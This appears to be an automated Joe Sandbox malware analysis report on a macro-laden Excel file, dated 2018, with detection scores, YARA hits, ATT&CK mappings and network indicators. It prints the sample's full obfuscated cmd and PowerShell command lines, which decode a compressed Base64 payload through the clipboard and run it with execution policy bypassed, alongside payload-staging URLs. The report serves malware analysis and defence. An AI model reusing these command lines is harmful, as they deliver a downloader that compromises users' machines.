Analysis Report 20310_011_11353_0_88.xls

Overview

General Information

Joe Sandbox Version: 25.0.0 Tiger's Eye
Analysis ID: 740517
Start date: 13.12.2018
Start time: 21:39:19
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 3m 40s
Localized Internet Anonymization: Successful, Pool ID 'Italy'
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 20310_011_11353_0_88.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.expl.evad.winXLS@13/18@1/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 84 | 0 - 100 | Report FP / FN | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false


Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts | Command-Line Interface21 | Winlogon Helper DLL | Process Injection1 | Disabling Security Tools1 | Credential Dumping | Process Discovery1 | Application Deployment Software | Clipboard Data1 | Data Encrypted1 | Standard Non-Application Layer Protocol2
Replication Through Removable Media | PowerShell2 | Port Monitors | Accessibility Features | Process Injection1 | Network Sniffing | Security Software Discovery1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Application Layer Protocol2
Drive-by Compromise | Scripting12 | Accessibility Features | Path Interception | Deobfuscate/Decode Files or Information1 | Input Capture | Remote System Discovery1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Custom Cryptographic Protocol
Exploit Public-Facing Application | Exploitation for Client Execution13 | System Firmware | DLL Search Order Hijacking | Scripting12 | Credentials in Files | File and Directory Discovery1 | Logon Scripts | Input Capture | Data Encrypted | Multiband Communication
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Obfuscated Files or Information1 | Account Manipulation | System Information Discovery21 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol

Signature Overview


AV Detection:

Antivirus detection for submitted file
Source: 20310_011_11353_0_88.xls | Avira: Label: VBA/Dldr.Agent.yogrg
Multi AV Scanner detection for submitted file
Source: 20310_011_11353_0_88.xls | virustotal: Detection: 22%
Yara signature match
Source: 00000006.00000002.1249360856.012C0000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.1249342410.006B0000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1264839354.01CC0000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248635443.00010000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000003.1249027719.00010000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263643081.01290000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263634948.01287000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248720839.00010000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248969895.00010000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263500876.00400000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263628810.01280000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248315695.00010000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.1249262618.00340000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1264845731.01CC7000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Spreading:

Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: images2.imgbox.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.1.81:49211 -> 64.210.135.68:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.1.81:49211 -> 64.210.135.68:443

Networking:

IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 64.210.135.68 64.210.135.68
Found strings which match to known social media urls
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: images2.imgbox.com
Urls found in memory or binary data
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com0#
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmp | String found in binary or memory: https://i.imgur.com/Hz99iZp.png
Source: powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmp | String found in binary or memory: https://images2.imgbox.com
Source: powershell.exe, 00000008.00000002.1262983725.00108000.00000004.sdmp | String found in binary or memory: https://images2.imgbox.com/43/d7/RDjs3JCK_o.png
Source: powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmp | String found in binary or memory: https://images2.imgbox.com/43/d7/RDjs3JCK_o.pngH
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49211
Source: unknown | Network traffic detected: HTTP traffic on port 49211 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary:

Powershell connects to network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 64.210.135.68 443
Very long command line found
Source: unknown | Process created: Commandline size = 7783
Source: unknown | Process created: Commandline size = 2530
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: Commandline size = 7783
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2530
Creates mutexes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 20310_011_11353_0_88.xls | OLE, VBA macro line: Sub Workbook_Open()
Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, Name: Workbook_Open
Document contains embedded VBA macros
Source: 20310_011_11353_0_88.xls | OLE indicator, VBA macros: true
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Classification label
Source: classification engine | Classification label: mal84.expl.evad.winXLS@13/18@1/1
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Excel
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user~1\AppData\Local\Temp\CVR1594.tmp
Document contains an OLE Workbook stream indicating a Microsoft Excel file
Source: 20310_011_11353_0_88.xls | OLE indicator, Workbook stream: true
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\clip.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: 20310_011_11353_0_88.xls | virustotal: Detection: 22%
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
Source: unknown | Process created: C:\Windows\System32\cmd.exe Cmd /C %QJi:''='%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknown | Process created: C:\Windows\System32\clip.exe cLiP
Source: unknownProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'ntJump to behavior
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe Cmd /C %QJi:''='%
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'Jump to behavior
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\clip.exe cLiP
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: mscorrc.pdb | source: powershell.exe, 00000008.00000002.1275888570.040D0000.00000002.sdmp
Document has a 'lastprinted' value indicative of goodware
Source: 20310_011_11353_0_88.xls | Initial sample: OLE summary lastprinted = 2014-11-21 11:09:31

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: 20310_011_11353_0_88.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : High number of string operations
Obfuscated command line found
Source: unknownProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
